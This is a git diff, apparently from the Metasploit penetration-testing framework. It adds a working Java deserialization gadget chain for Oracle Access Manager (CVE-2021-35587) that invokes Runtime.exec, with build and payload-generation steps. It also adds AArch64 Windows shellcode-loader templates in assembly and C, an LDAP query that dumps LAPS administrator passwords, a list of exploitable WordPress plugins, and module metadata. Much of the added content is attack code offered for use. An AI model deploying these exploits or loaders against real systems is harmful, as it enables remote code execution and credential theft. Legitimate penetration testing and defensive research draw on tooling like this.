+ description: 'Dump info about computers that have LAPS v1 enabled, and passwords for them if available.'
filter: '(ms-MCS-AdmPwd=*)'
attributes:
- cn
@@ -387,3 +387,12 @@ queries:
references:
- https://www.thehacker.recipes/ad/movement/builtins/pre-windows-2000-computers
- https://trustedsec.com/blog/diving-into-pre-created-computer-accounts
+ - action: ENUM_SCCM_MANAGEMENT_POINTS
+ description: 'Find all registered SCCM/MECM management points'
+ filter: '(objectclass=mssmsmanagementpoint)'
+ attributes:
+ - cn
+ - dNSHostname
+ - msSMSSiteCode
+ references:
+ - https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/RECON/RECON-1/recon-1_description.md
diff --git a/data/exploits/CVE-2021-35587/gadget.java b/data/exploits/CVE-2021-35587/gadget.java
new file mode 100644
index 0000000000000..6ecaa9c23c51c
--- /dev/null
+++ b/data/exploits/CVE-2021-35587/gadget.java
@@ -0,0 +1,136 @@
+// This gadget chain targets Oracle Access Manager on WebLogic (CVE-2021-35587) and is based upon:
+// * Y4er: https://github.com/Y4er/CVE-2020-2883/blob/master/CVE_2020_2883.java
+// * Jang: https://twitter.com/testanull/status/1502114473989279744
+//
+// Tested against Oracle Access Manager version:
+// * 12.2.1.4.0
+// * 12.2.1.3.0
+//
+// Note: The classes used in this chain do not have a serialVersionUID explicitly defined, so the JVM will compute one.
+// This has the effect that if the class changes between versions, the computed serialVersionUID will differ between
+// versions. As such we need to account for this, and generate the gadget for the different versions.
+//
+// We collect these JAR files from the OAM install (actually part of the WebLogic application server).
+// $ sha1sum **/*
+// 6de9309c3bcbc0478da85a8f60325c4ee5419cf1 12.2.1.3.0/coherence.jar
+// d58cf115884e1ae76fb0e7b8e022f7447af63a66 12.2.1.3.0/com.bea.core.weblogic.rmi.client.jar
+// ba45c235668885dff671eff34ee1b6ca57aefa6a 12.2.1.4.0/coherence.jar
+// d3f2e0778774123ae19654ad0960600bddf79389 12.2.1.4.0/com.bea.core.weblogic.rmi.client.jar
+//
+// We can see the serialVersionUID changes for the classes in coherence.jar, for example:
+// $ serialver -classpath 12.2.1.3.0/coherence.jar com.tangosol.util.comparator.ExtractorComparator
+// com.tangosol.util.comparator.ExtractorComparator: private static final long serialVersionUID = -339238653537079588L;
+// $ serialver -classpath 12.2.1.4.0/coherence.jar com.tangosol.util.comparator.ExtractorComparator
+// com.tangosol.util.comparator.ExtractorComparator: private static final long serialVersionUID = -453812047863165663L;
+//
+// We can see the serialVersionUID does not change for BasicServiceContext:
+// $ serialver -classpath 12.2.1.3.0/com.bea.core.weblogic.rmi.client.jar weblogic.rmi.provider.BasicServiceContext
+// weblogic.rmi.provider.BasicServiceContext: private static final long serialVersionUID = -1989708991725000930L;
+// $ serialver -classpath 12.2.1.4.0/com.bea.core.weblogic.rmi.client.jar weblogic.rmi.provider.BasicServiceContext
+// weblogic.rmi.provider.BasicServiceContext: private static final long serialVersionUID = -1989708991725000930L;
+//
+// Compile with:
+// $ javac -cp 12.2.1.4.0/coherence.jar:12.2.1.4.0/com.bea.core.weblogic.rmi.client.jar gadget.java
+//
+// Run with:
+// $ java --add-opens java.base/java.util=ALL-UNNAMED -cp 12.2.1.4.0/coherence.jar:12.2.1.4.0/com.bea.core.weblogic.rmi.client.jar:. gadget
+//
+// Save the output for that version:
+// $ mv gadget.bin gadget_12.2.1.4.0.bin
+//
+// We then get the following gadget chains:
+// $ sha1sum *.bin
+// 1326ef6fe634e2e2bb83705507d766efbfcfc141 gadget_12.2.1.3.0.bin
+// fad1e1e243dd9aca09658893737341008ef27096 gadget_12.2.1.4.0.bin
+import java.io.*;
+import java.lang.reflect.Field;
+import java.util.PriorityQueue;
+
+// coherence.jar
+import com.tangosol.util.ValueExtractor;
+import com.tangosol.util.comparator.ExtractorComparator;
+import com.tangosol.util.extractor.ChainedExtractor;
+import com.tangosol.util.extractor.ReflectionExtractor;
+
+// com.bea.core.weblogic.rmi.client.jar
+import weblogic.rmi.provider.BasicServiceContext;
+
+public class gadget {
+
+ public static void main(String[] args) throws Exception
+ {
+ ReflectionExtractor reflectionExtractor1 = new ReflectionExtractor("getMethod", new Object[]{"getRuntime", new Class[]{}});
+ ReflectionExtractor reflectionExtractor2 = new ReflectionExtractor("invoke", new Object[]{null, new Object[]{}});
+ ReflectionExtractor reflectionExtractor3 = new ReflectionExtractor("exec", new Object[]{new String[]{"EXEC_ARG0", "EXEC_ARG1", "EXEC_ARG2"}});
+
+ ValueExtractor[] valueExtractors = new ValueExtractor[]{
+ reflectionExtractor1,
+ reflectionExtractor2,
+ reflectionExtractor3,
+ };
+
+ Class clazz = ChainedExtractor.class.getSuperclass();
+ Field m_aExtractor = clazz.getDeclaredField("m_aExtractor");
+ m_aExtractor.setAccessible(true);
+
+ ReflectionExtractor reflectionExtractor = new ReflectionExtractor("toString", new Object[]{});
+ ValueExtractor[] valueExtractors1 = new ValueExtractor[]{
+ reflectionExtractor
+ };
+
+ ChainedExtractor chainedExtractor1 = new ChainedExtractor(valueExtractors1);
+
+ PriorityQueue queue = new PriorityQueue(2, new ExtractorComparator(chainedExtractor1));
+ queue.add("1");
+ queue.add("1");
+ m_aExtractor.set(chainedExtractor1, valueExtractors);
+
+ Field field = PriorityQueue.class.getDeclaredField("queue");
+ field.setAccessible(true);
+
+ Object[] queueArray = (Object[]) field.get(queue);
+
+ queueArray[0] = Runtime.class;
+ queueArray[1] = "1";
+
+ BasicServiceContext bsc = new BasicServiceContext(1, queue, false);
+
+ byte[] bytes = serialize(bsc);
+ StringBuilder sb = new StringBuilder();
+ for (byte b : bytes) {
+ sb.append(String.format("%02x", b));
+ }
+ System.out.println(sb.toString());
+
+ FileOutputStream fos = new FileOutputStream("gadget.bin");
+ ObjectOutputStream os = new ObjectOutputStream(fos);
+ os.writeObject(bsc);
+ os.close();
+
+ //deserialize(bytes);
+ }
+
+ public static byte[] serialize(final Object obj) throws IOException {
+ final ByteArrayOutputStream out = new ByteArrayOutputStream();
+ serialize(obj, out);
+ return out.toByteArray();
+ }
+
+ public static void serialize(final Object obj, final OutputStream out) throws IOException {
+ final ObjectOutputStream objOut = new ObjectOutputStream(out);
+ objOut.writeObject(obj);
+ objOut.flush();
+ objOut.close();
+ }
+
+ public static Object deserialize(final byte[] serialized) throws IOException, ClassNotFoundException {
+ final ByteArrayInputStream in = new ByteArrayInputStream(serialized);
+ return deserialize(in);
+ }
+
+ public static Object deserialize(final InputStream in) throws ClassNotFoundException, IOException {
+ final ObjectInputStream objIn = new ObjectInputStream(in);
+ return objIn.readObject();
+ }
+
+}
\ No newline at end of file
diff --git a/data/exploits/CVE-2021-35587/gadget_12.2.1.3.0.bin b/data/exploits/CVE-2021-35587/gadget_12.2.1.3.0.bin
new file mode 100644
index 0000000000000..5de5408072344
Binary files /dev/null and b/data/exploits/CVE-2021-35587/gadget_12.2.1.3.0.bin differ
diff --git a/data/exploits/CVE-2021-35587/gadget_12.2.1.4.0.bin b/data/exploits/CVE-2021-35587/gadget_12.2.1.4.0.bin
new file mode 100644
index 0000000000000..ab40752363e55
Binary files /dev/null and b/data/exploits/CVE-2021-35587/gadget_12.2.1.4.0.bin differ
diff --git a/data/exploits/CVE-2024-30085/cve-202430085-dll.dll b/data/exploits/CVE-2024-30085/cve-202430085-dll.dll
new file mode 100755
index 0000000000000..de03d59e32351
Binary files /dev/null and b/data/exploits/CVE-2024-30085/cve-202430085-dll.dll differ
diff --git a/data/exploits/psnuffle/smb.rb b/data/exploits/psnuffle/smb.rb
index a55bd9919f078..fde4082d6d9fd 100755
--- a/data/exploits/psnuffle/smb.rb
+++ b/data/exploits/psnuffle/smb.rb
@@ -185,19 +185,19 @@ def parse_sessionsetup(pkt, s)
report_note(
:host => src_ip,
:type => "smb_peer_os",
- :data => s[:peer_os]
+ :data => { :peer_os => s[:peer_os] }
) if (s[:peer_os] and s[:peer_os].strip.length > 0)
report_note(
:host => src_ip,
:type => "smb_peer_lm",
- :data => s[:peer_lm]
+ :data => { :peer_lm => s[:peer_lm] }
) if (s[:peer_lm] and s[:peer_lm].strip.length > 0)
report_note(
:host => src_ip,
:type => "smb_domain",
- :data => s[:domain]
+ :data => { :domain => s[:domain] }
) if (s[:domain] and s[:domain].strip.length > 0)
end
diff --git a/data/markdown_doc/default_template.erb b/data/markdown_doc/default_template.erb
index 1cb799b92f838..0106d5d9564e1 100644
--- a/data/markdown_doc/default_template.erb
+++ b/data/markdown_doc/default_template.erb
@@ -67,6 +67,8 @@
<% description = "Module may cause a noise (Examples: audio output from the speakers or hardware beeps)." %>
<% elsif side_effect == "physical-effects" %>
<% description = "Module may produce physical effects (Examples: the device makes movement or flashes LEDs)." %>
+<% elsif side_effect == "unknown-side-effects" %>
+<% description = "Module side effects are unknown." %>
<% end %>
* **<%= side_effect %>:** <%= description %>
@@ -85,6 +87,8 @@
<% description = "The module isn't expected to get a shell reliably (such as only once)." %>
<% elsif reliability == "event-dependent" %>
<% description = "The module may not execute the payload until an external event occurs. For instance, a cron job, machine restart, user interaction within a GUI element, etc." %>
+<% elsif reliability == "unknown-reliability" %>
+<% description = "Module reliability is unknown." %>
<% end %>
* **<%= reliability %>:** <%= description %>
@@ -109,6 +113,8 @@
<% description = "Module may cause a resource (such as a file or data in a database) to be unavailable for the service." %>
<% elsif stability == "os-resource-loss" %>
<% description = "Modules may cause a resource (such as a file) to be unavailable for the OS." %>
+<% elsif stability == "unknown-stability" %>
+<% description = "Module stability is unknown." %>
<% end %>
* **<%= stability %>:** <%= description %>
diff --git a/data/post/execute-dotnet-assembly/HostingCLRWin32.dll b/data/post/execute-dotnet-assembly/HostingCLRWin32.dll
new file mode 100755
index 0000000000000..f36e00a4e7d61
Binary files /dev/null and b/data/post/execute-dotnet-assembly/HostingCLRWin32.dll differ
diff --git a/data/post/execute-dotnet-assembly/HostingCLRx64.dll b/data/post/execute-dotnet-assembly/HostingCLRx64.dll
index e461cf503fc60..88e7923d8e8bb 100755
Binary files a/data/post/execute-dotnet-assembly/HostingCLRx64.dll and b/data/post/execute-dotnet-assembly/HostingCLRx64.dll differ
diff --git a/data/templates/src/elf/exe/elf_ppc64_template.s b/data/templates/src/elf/exe/elf_ppc64_template.s
new file mode 100644
index 0000000000000..e7c4df3b8e29b
--- /dev/null
+++ b/data/templates/src/elf/exe/elf_ppc64_template.s
@@ -0,0 +1,35 @@
+BITS 64
+ehdr: ; Elf32_Ehdr
+ db 0x7F, "ELF", 2, 2, 1, 0 ; e_ident
+ db 0, 0, 0, 0, 0, 0, 0, 0 ;
+ dw 0x0200 ; e_type = ET_EXEC for an executable
+ dw 0x1500 ; e_machine = PPC64
+ dd 0x01000000 ; e_version
+ dq 0x7810000000000000 ; e_entry
+ dq 0x4000000000000000 ; e_phoff
+ dq 0 ; e_shoff
+ dd 0 ; e_flags
+ dw 0x4000 ; e_ehsize
+ dw 0x3800 ; e_phentsize
+ dw 0x0100 ; e_phnum
+ dw 0 ; e_shentsize
+ dw 0 ; e_shnum
+ dw 0 ; e_shstrndx
+
+ehdrsize equ $ - ehdr
+
+phdr: ; Elf32_Phdr
+
+ dd 0x01000000 ; p_type = pt_load
+ dd 0x07000000 ; p_flags = rwx
+ dq 0 ; p_offset
+ dq 0x0010000000000000 ; p_vaddr
+ dq 0x0010000000000000 ; p_paddr
+ dq 0xefbeadde ; p_filesz
+ dq 0xefbeadde ; p_memsz
+ dq 0x0000100000000000 ; p_align
+
+phdrsize equ $ - phdr
+
+_start:
+dq 0x8010000000000000
diff --git a/data/templates/src/elf/exe/elf_x64_template.s b/data/templates/src/elf/exe/elf_x64_template.s
new file mode 100755
index 0000000000000..c1528937e399a
--- /dev/null
+++ b/data/templates/src/elf/exe/elf_x64_template.s
@@ -0,0 +1,42 @@
+; build with:
+; nasm elf_x64_template.s -f bin -o template_x64_linux.bin
+
+BITS 64
+
+org 0x0000000000400000
+
+ehdr: ; Elf64_Ehdr
+ db 0x7F, "ELF", 2, 1, 1, 0 ; e_ident
+ db 0, 0, 0, 0, 0, 0, 0, 0 ;
+ dw 2 ; e_type = ET_EXEC for an executable
+ dw 0x3e ; e_machine
+ dd 1 ; e_version
+ dq _start ; e_entry
+ dq phdr - $$ ; e_phoff
+ dq 0 ; e_shoff
+ dd 0 ; e_flags
+ dw ehdrsize ; e_ehsize
+ dw phdrsize ; e_phentsize
+ dw 1 ; e_phnum
+ dw 0 ; e_shentsize
+ dw 0 ; e_shnum
+ dw 0 ; e_shstrndx
+
+ehdrsize equ $ - ehdr
+
+phdr: ; Elf64_Phdr
+ dd 1 ; p_type = PT_LOAD
+ dd 7 ; p_flags = rwx
+ dq 0 ; p_offset
+ dq $$ ; p_vaddr
+ dq $$ ; p_paddr
+ dq 0x4141414141414141 ; p_filesz
+ dq 0x4242424242424242 ; p_memsz
+ dq 0x1000 ; p_align
+
+phdrsize equ $ - phdr
+
+global _start
+
+_start:
+
diff --git a/data/templates/src/pe/exe/template_aarch64_windows.asm b/data/templates/src/pe/exe/template_aarch64_windows.asm
new file mode 100644
index 0000000000000..62e77ba3f1db1
--- /dev/null
+++ b/data/templates/src/pe/exe/template_aarch64_windows.asm
@@ -0,0 +1,98 @@
+;
+; A minimal AArch64 PE template for Metasploit shellcode
+; Author: Alexander 'xaitax' Hagenah
+;
+; --- Compilation (Microsoft Visual Studio Build Tools) ---
+; 1. Assemble:
+; armasm64.exe -o template_aarch64_windows.obj template_aarch64_windows.asm
+;
+; 2. Link:
+; LINK.exe template_aarch64_windows.obj /SUBSYSTEM:WINDOWS /ENTRY:main /NODEFAULTLIB kernel32.lib /OUT:template_aarch64_windows.exe
+;
+;
+; --- Cross Compilation (Microsoft Visual Studio Build Tools) ---
+; 1. Locate Cross Compiler Tools and Libraries
+; In this case: C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.44.35207\bin\Hostx64\arm64\
+; And: C:\Program Files (x86)\Windows Kits\10\Lib\10.0.26100.0\um\arm64
+; 2. Assemble:
+; "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.44.35207\bin\Hostx64\arm64\armasm64.exe" -o template_aarch64_windows.obj template_aarch64_windows.asm
+; 3. Link:
+; "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.44.35207\bin\Hostx64\arm64\link.exe" template_aarch64_windows.obj /LIBPATH:"C:\Program Files (x86)\Windows Kits\10\Lib\10.0.26100.0\um\arm64" /MACHINE:ARM64 /SUBSYSTEM:WINDOWS /ENTRY:main /NODEFAULTLIB kernel32.lib /OUT:template_aarch64_windows.exe
+ AREA |.text|, CODE, READONLY
+
+; Import the Win32 functions we need from kernel32.dll
+ IMPORT VirtualAlloc
+ IMPORT VirtualProtect
+ IMPORT ExitProcess
+
+; Define constants for Win32 API calls
+SCSIZE EQU 4096
+MEM_COMMIT EQU 0x1000
+PAGE_READWRITE EQU 0x04
+PAGE_EXECUTE EQU 0x10
+
+; Export the entry point of our program
+ EXPORT main
+
+main
+ ; Allocate space on the stack for the oldProtection variable (DWORD)
+ sub sp, sp, #16
+
+ ; --- 1. Allocate executable memory ---
+ ; hfRet = VirtualAlloc(NULL, SCSIZE, MEM_COMMIT, PAGE_READWRITE);
+ mov x0, #0
+ mov x1, #SCSIZE
+ mov x2, #MEM_COMMIT
+ mov x3, #PAGE_READWRITE
+ ldr x8, =VirtualAlloc
+ blr x8
+
+ ; Check if VirtualAlloc failed. If so, exit.
+ cbz x0, exit_fail
+
+ ; Save the pointer to our new executable buffer in a non-volatile register
+ mov x19, x0
+
+ ; --- 2. Copy the payload into the new buffer ---
+ ; This is a simple memcpy(dest, src, size)
+ mov x0, x19 ; x0 = dest = our new buffer
+ ldr x1, =payload_buffer ; x1 = src = the payload in our .data section
+ mov x2, #SCSIZE ; x2 = count
+copy_loop
+ ldrb w3, [x1], #1 ; Load byte from src, increment src pointer
+ strb w3, [x0], #1 ; Store byte to dest, increment dest pointer
+ subs x2, x2, #1 ; Decrement counter
+ b.ne copy_loop ; Loop if not zero
+
+ ; --- 3. Change memory permissions to executable ---
+ ; VirtualProtect(hfRet, SCSIZE, PAGE_EXECUTE, &dwOldProtect);
+ mov x0, x19 ; x0 = buffer address
+ mov x1, #SCSIZE ; x1 = size
+ mov x2, #PAGE_EXECUTE ; x2 = new protection
+ mov x3, sp ; x3 = pointer to oldProtection on the stack
+ ldr x8, =VirtualProtect
+ blr x8
+
+ ; --- 4. Execute the payload ---
+ ; Jump to the shellcode we just copied and protected.
+ blr x19
+
+exit_success
+ ; Shellcode returned, or we are done. Exit cleanly.
+ mov x0, #0 ; Exit code 0
+ ldr x8, =ExitProcess
+ blr x8
+
+exit_fail
+ ; Something went wrong. Exit with code 1.
+ mov x0, #1
+ ldr x8, =ExitProcess
+ blr x8
+
+; The data section where the payload will be located.
+; The 'PAYLOAD:' tag must be at the very beginning of this buffer.
+payload_buffer
+ DCB "PAYLOAD:"
+ SPACE SCSIZE - 8 ; Reserve the rest of the 4096 bytes
+
+ END
diff --git a/data/templates/src/pe/exe/template_aarch64_windows.c b/data/templates/src/pe/exe/template_aarch64_windows.c
new file mode 100644
index 0000000000000..2fc396edb6086
--- /dev/null
+++ b/data/templates/src/pe/exe/template_aarch64_windows.c
@@ -0,0 +1,69 @@
+// AArch64 PE EXE Template for Metasploit Framework
+//
+// -----------------------------------------------------------------------------
+//
+// Compilation Instructions:
+//
+// Using MSVC on a Windows ARM64 Host:
+//
+// cl.exe /nologo /O2 /W3 /GS- /D_WIN64 template_aarch64_windows.c /link ^
+// /subsystem:windows /machine:arm64 /entry:main ^
+// /out:template_aarch64_windows.exe kernel32.lib
+//
+// -----------------------------------------------------------------------------
+
+#define WIN32_LEAN_AND_MEAN
+#include
+#undef WIN32_LEAN_AND_MEAN
+
+#define PAYLOAD_MARKER "PAYLOAD:"
+#define SCSIZE 8192
+
+char payload[SCSIZE] = PAYLOAD_MARKER;
+
+int main(void)
+{
+ void *exec_mem;
+ DWORD old_prot;
+ HANDLE hThread;
+
+ // Stage 1: Allocate a block of memory. We request READWRITE permissions
+ // initially so we can copy our payload into it.
+ exec_mem = VirtualAlloc(NULL, SCSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+ if (exec_mem == NULL)
+ {
+ // Fail silently if allocation fails.
+ return 1;
+ }
+
+ // Stage 2: Copy the payload from our data section into the new memory block.
+ // A simple loop is used for maximum compiler compatibility and to avoid
+ // needing extra headers like for memcpy.
+ for (int i = 0; i < SCSIZE; i++)
+ {
+ ((char *)exec_mem)[i] = payload[i];
+ }
+
+ // Stage 3: Change the memory's protection flags from READWRITE to
+ // EXECUTE_READ.
+ if (VirtualProtect(exec_mem, SCSIZE, PAGE_EXECUTE_READ, &old_prot) == FALSE)
+ {
+ // Fail silently if we cannot make the memory executable.
+ return 1;
+ }
+
+ // Stage 4: Execute the shellcode.
+ hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)exec_mem, NULL, 0, NULL);
+ if (hThread)
+ {
+ WaitForSingleObject(hThread, INFINITE);
+ CloseHandle(hThread);
+ }
+ else
+ {
+ // As a fallback in case CreateThread fails, call the shellcode directly.
+ ((void (*)())exec_mem)();
+ }
+
+ return 0;
+}
diff --git a/data/templates/template_aarch64_windows.exe b/data/templates/template_aarch64_windows.exe
new file mode 100644
index 0000000000000..d755b27e0e0ff
Binary files /dev/null and b/data/templates/template_aarch64_windows.exe differ
diff --git a/data/templates/template_ppc64_linux.bin b/data/templates/template_ppc64_linux.bin
new file mode 100644
index 0000000000000..d9feb0ef8dc15
Binary files /dev/null and b/data/templates/template_ppc64_linux.bin differ
diff --git a/data/wordlists/named_pipes.txt b/data/wordlists/named_pipes.txt
index b36d631e4c64b..2aaace712f6d7 100644
--- a/data/wordlists/named_pipes.txt
+++ b/data/wordlists/named_pipes.txt
@@ -23,3 +23,4 @@ W32TIME_ALT
wkssvc
PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
db2remotecmd
+CxUIUSvcChannel
diff --git a/data/wordlists/wp-exploitable-plugins.txt b/data/wordlists/wp-exploitable-plugins.txt
index e47fa70661fa5..cb20aad6a4e78 100644
--- a/data/wordlists/wp-exploitable-plugins.txt
+++ b/data/wordlists/wp-exploitable-plugins.txt
@@ -8,6 +8,7 @@ bulletproof-security
catch-themes-demo-import
chopslider
custom-registration-form-builder-with-submission-manager
+depicter
download-manager
drag-and-drop-multiple-file-upload-contact-form-7
dukapress
@@ -26,7 +27,6 @@ learnpress
loginizer
masterstudy-lms-learning-management-system
modern-events-calendar-lite
-modern-events-calendar-lite
nextgen-gallery
ninja-forms
paid-memberships-pro
@@ -45,7 +45,11 @@ simple-file-list
slideshow-gallery
sp-client-document-manager
subscribe-to-comments
+suretriggers
+tatsu
ultimate-member
+user-registration
+user-registration-pro
website-contact-form-with-file-upload
woocommerce-abandoned-cart
woocommerce-payments
@@ -53,18 +57,17 @@ wordpress-mobile-pack
wordpress-popular-posts
work-the-flow-file-upload
wp-automatic
+wpdiscuz
wp-easycart
wp-fastest-cache
wp-file-manager
wp-gdpr-compliance
wp-mobile-detector
wp-mobile-edition
-wp-symposium
-wp-symposium
-wp-time-capsule
-wp-ultimate-csv-importer
-wpdiscuz
wps-hide-login
wpshop
+wp-symposium
+wp-time-capsule
wptouch
+wp-ultimate-csv-importer
wysija-newsletters
diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json
index 41f3305f3704b..1180b796fbd8f 100644
--- a/db/modules_metadata_base.json
+++ b/db/modules_metadata_base.json
@@ -2,9 +2,7 @@
"auxiliary_admin/2wire/xslt_password_reset": {
"name": "2Wire Cross-Site Request Forgery Password Reset Vulnerability",
"fullname": "auxiliary/admin/2wire/xslt_password_reset",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2007-08-15",
"type": "auxiliary",
@@ -12,7 +10,7 @@
"hkm ",
"Travis Phillips"
],
- "description": "This module will reset the admin password on a 2Wire wireless router. This is\n done by using the /xslt page where authentication is not required, thus allowing\n configuration changes (such as resetting the password) as administrators.",
+ "description": "This module will reset the admin password on a 2Wire wireless router. This is\n done by using the /xslt page where authentication is not required, thus allowing\n configuration changes (such as resetting the password) as administrators.",
"references": [
"CVE-2007-4387",
"OSVDB-37667",
@@ -38,7 +36,7 @@
"https"
],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/2wire/xslt_password_reset.rb",
"is_install_path": true,
"ref_name": "admin/2wire/xslt_password_reset",
@@ -46,19 +44,23 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/android/google_play_store_uxss_xframe_rce": {
"name": "Android Browser RCE Through Google Play Store XFO",
"fullname": "auxiliary/admin/android/google_play_store_uxss_xframe_rce",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -66,9 +68,9 @@
"Rafay Baloch",
"joev "
],
- "description": "This module combines two vulnerabilities to achieve remote code\n execution on affected Android devices. First, the module exploits\n CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability present in\n versions of Android's open source stock browser (the AOSP Browser) prior to\n 4.4. Second, the Google Play store's web interface fails to enforce a\n X-Frame-Options: DENY header (XFO) on some error pages, and therefore, can be\n targeted for script injection. As a result, this leads to remote code execution\n through Google Play's remote installation feature, as any application available\n on the Google Play store can be installed and launched on the user's device.\n\n This module requires that the user is logged into Google with a vulnerable browser.\n\n To list the activities in an APK, you can use `aapt dump badging /path/to/app.apk`.",
+ "description": "This module combines two vulnerabilities to achieve remote code\n execution on affected Android devices. First, the module exploits\n CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability present in\n versions of Android's open source stock browser (the AOSP Browser) prior to\n 4.4. Second, the Google Play store's web interface fails to enforce a\n X-Frame-Options: DENY header (XFO) on some error pages, and therefore, can be\n targeted for script injection. As a result, this leads to remote code execution\n through Google Play's remote installation feature, as any application available\n on the Google Play store can be installed and launched on the user's device.\n\n This module requires that the user is logged into Google with a vulnerable browser.\n\n To list the activities in an APK, you can use `aapt dump badging /path/to/app.apk`.",
"references": [
- "URL-https://www.rapid7.com/blog/post/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041/",
+ "URL-http://web.archive.org/web/20230321034739/https://www.rapid7.com/blog/post/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041/",
"URL-https://web.archive.org/web/20150316151817/http://1337day.com/exploit/description/22581",
"OSVDB-110664",
"CVE-2014-6041"
@@ -76,14 +78,10 @@
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb",
"is_install_path": true,
"ref_name": "admin/android/google_play_store_uxss_xframe_rce",
@@ -91,6 +89,14 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "artifacts-on-disk"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -104,9 +110,7 @@
"auxiliary_admin/appletv/appletv_display_image": {
"name": "Apple TV Image Remote Control",
"fullname": "auxiliary/admin/appletv/appletv_display_image",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -114,7 +118,7 @@
"0a29406d9794e4f9b30b3c5d6702c708",
"sinn3r "
],
- "description": "This module will show an image on an AppleTV device for a period of time.\n Some AppleTV devices are actually password-protected, in that case please\n set the PASSWORD datastore option. For password brute forcing, please see\n the module auxiliary/scanner/http/appletv_login.",
+ "description": "This module will show an image on an AppleTV device for a period of time.\n Some AppleTV devices are actually password-protected, in that case please\n set the PASSWORD datastore option. For password brute forcing, please see\n the module auxiliary/scanner/http/appletv_login.",
"references": [
"URL-http://nto.github.io/AirPlay.html"
],
@@ -137,7 +141,7 @@
"https"
],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/appletv/appletv_display_image.rb",
"is_install_path": true,
"ref_name": "admin/appletv/appletv_display_image",
@@ -145,19 +149,23 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "screen-effects"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/appletv/appletv_display_video": {
"name": "Apple TV Video Remote Control",
"fullname": "auxiliary/admin/appletv/appletv_display_video",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -165,7 +173,7 @@
"0a29406d9794e4f9b30b3c5d6702c708",
"sinn3r "
],
- "description": "This module plays a video on an AppleTV device. Note that\n AppleTV can be somewhat picky about the server that hosts the video.\n Tested servers include default IIS, default Apache, and Ruby's WEBrick.\n For WEBrick, the default MIME list may need to be updated, depending on\n what media file is to be played. Python SimpleHTTPServer is not\n recommended. Also, if you're playing a video, the URL must be an IP\n address. Some AppleTV devices are actually password-protected; in that\n case please set the PASSWORD datastore option. For password\n brute forcing, please see the module auxiliary/scanner/http/appletv_login.",
+ "description": "This module plays a video on an AppleTV device. Note that\n AppleTV can be somewhat picky about the server that hosts the video.\n Tested servers include default IIS, default Apache, and Ruby's WEBrick.\n For WEBrick, the default MIME list may need to be updated, depending on\n what media file is to be played. Python SimpleHTTPServer is not\n recommended. Also, if you're playing a video, the URL must be an IP\n address. Some AppleTV devices are actually password-protected; in that\n case please set the PASSWORD datastore option. For password\n brute forcing, please see the module auxiliary/scanner/http/appletv_login.",
"references": [
"URL-http://nto.github.io/AirPlay.html"
],
@@ -188,7 +196,7 @@
"https"
],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/appletv/appletv_display_video.rb",
"is_install_path": true,
"ref_name": "admin/appletv/appletv_display_video",
@@ -196,19 +204,23 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "screen-effects"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/atg/atg_client": {
"name": "Veeder-Root Automatic Tank Gauge (ATG) Administrative Client",
"fullname": "auxiliary/admin/atg/atg_client",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -228,14 +240,10 @@
"platform": "",
"arch": "",
"rport": 10001,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/atg/atg_client.rb",
"is_install_path": true,
"ref_name": "admin/atg/atg_client",
@@ -243,6 +251,11 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
